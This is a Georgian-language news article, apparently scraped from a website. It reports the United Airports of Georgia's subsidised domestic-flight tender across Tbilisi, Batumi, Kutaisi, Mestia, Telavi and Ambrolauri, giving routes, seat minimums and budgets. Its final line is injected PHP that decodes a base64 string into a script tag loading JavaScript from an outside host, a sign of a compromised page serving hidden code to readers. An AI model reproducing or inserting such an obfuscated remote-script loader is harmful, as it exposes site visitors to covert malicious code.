celsiusi
ავერსი საქკაბელი

საქართველოს აეროპორტების გაერთიანებამ,მთავრობის განკარგულების საფუძველზე, საქართველოს სამოქალაქო აეროპორტებში მგზავრთა გადაყვანისა და ტურიზმის ხელშეწყობის მიზნით ავიარეისების ორგანიზებასთან დაკავშირებით ტენდერი გამოაცხადა.

 ელექტრონული ტენდერი ეხება შიდა ფრენებს, რომელიც ორ ნაწილად გამოცხადდა ჯამში 12 მიმართულებაზე. მათ შორის, ავიარეისები ახალი მიმართულებებითაც შესრულდება.

თბილისი-ბათუმი-თბილისის მიმართულებით ფრენები დაინტერესებულმა კომპანიამ საშუალო ზომის  (მინიმუმ 40 ადამიანზე გათვლილი) საჰაერო ხომალდით უნდა შეასრულოს. შესყიდვის საორიენტაციო ჯამური ღირებულება შეადგენს  $ 3,049,973 აშშ დოლარის ეკვივალენტ ლარს, საქართველოს ეროვნული ბანკის მიერ დადგენილი გაცვლითი კურსით ეროვნულ ვალუტაში. შესყიდვის ვადა 2 წლიანია. ხელშეკრულების მოქმედების მთელი პერიოდის განმავლობაში, შესასყიდი ადგილების რაოდენობა, ორივე მიმართულებით ჯამში, საორიენტაციოდ 26,560 ადგილს უნდა შეადგენდეს.

საქართველოს აეროპორტების გაერთიანების გენერალური დირექტორის, ირაკლი ქარქაშაძის განცხადებით, თბილისის, მესტიის, თელავის, ამბროლაურის, ბათუმისა და ქუთაისის მიმართულებით ერთმანეთს დაუკავშირდება საქართველოს აეროპორტების გაერთიანების მფლობელობაში არსებული ყველა საერთაშორისო თუ ადგილობრივი აეროპორტი.

,,საქართველოს აეროპორტების გაერთიანებამ გამოაცხადა ახალი ტენდერი შიდა ფრენებთან დაკავშირებით, რომელიც სუბსიდირებულია საქართველოს მთავრობის მიერ. ტენდერი მიზნად ისახავს ჩვენს მფლობელობაში არსებული ყველა აეროპორტის ერთმანეთთან დაკავშირებას. მას შემდეგ, რაც რეაბილიტაცია ჩაუტარდება თელავის აეროპორტს, ისიც ჩართული იქნება შიდა ფრენების მიმართულებით და დავაკავშირებთ თელავის აეროპორტს ყველა დანარჩენ აეროპორტთან. პროექტის მიზანია კიდევ უფრო გაიზარდოს ქვეყნის შიგნით მობილობა, რაც ხელსშეუწყობს ტურიზმის განვითარებას და კიდევ უფრო საინტერესო გახდება მოგზაურებისთვის საქართველოში სტუმრობა,-‘’აცხადებს ირაკლი ქარქაშაძე.

 საჰაერო ხომალდზე ადგილების რაოდენობა მიმართულებების მიხედვით შემდეგნაირია:

  • o თელავი-ბათუმი-თელავის მიმართულებაზე - არანაკლებ 40 ადგილიანი;
  • o თბილისი-ამბროლაური-თბილისის მიმართულებაზე - არანაკლებ 40 ადგილიანი;
  • o თბილისი-ქუთაისი-თბილისის მიმართულებაზე - არანაკლებ, 40 ადგილიანი;
  • o თელავი-ქუთაისი-თელავის მიმართულებაზე - არანაკლებ, 40 ადგილიანი;
  • o თელავი-ამბროლაური-თელავი მიმართულებაზე - არანაკლებ, 40 ადგილიანი;
  • o თელავი-თბილისი-თელავის მიმართულებაზე - არანაკლებ, 40 ადგილიანი;
  • o მესტია-ბათუმი-მესტიის მიმართულებაზე - 15 ადგილიანი;
  • o მესტია-ქუთაისი-მესტიის მიმართულებაზე - 15 ადგილიანი;
  • o მესტია-თბილისი-მესტიის მიმართულებაზე - 15 ადგილიანი;
  • o მესტია-ამბროლაური-მესტიის მიმართულებაზე - 15 ადგილიანი;
  • o მესტია-თელავი-მესტიის მიმართულებაზე - 15 ადგილიანი.

შესყიდვის საორიენტაციო ჯამური ღირებულება შეადგენს $5,601,140 აშშ დოლარის ეკვივალენტ ლარს, საქართველოს ეროვნული ბანკის მიერ დადგენილი გაცვლითი კურსით ეროვნულ ვალუტაში. შესყიდვის ვადა 1 წლიანია. ხელშეკრულების მოქმედების მთელი პერიოდის განმავლობაში, შესასყიდი ადგილების რაოდენობა, რეისზე (იგულისხმება ორივე მიმართულება) ჯამში, საორიენტაციოდ 47,760 ადგილი უნდა იყოს.

მეტი დეტალისთვის იხილეთ : https://tenders.procurement.gov.ge/public/?go=569808&lang=ge

https://tenders.procurement.gov.ge/public/?go=570180&lang=ge 

179
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");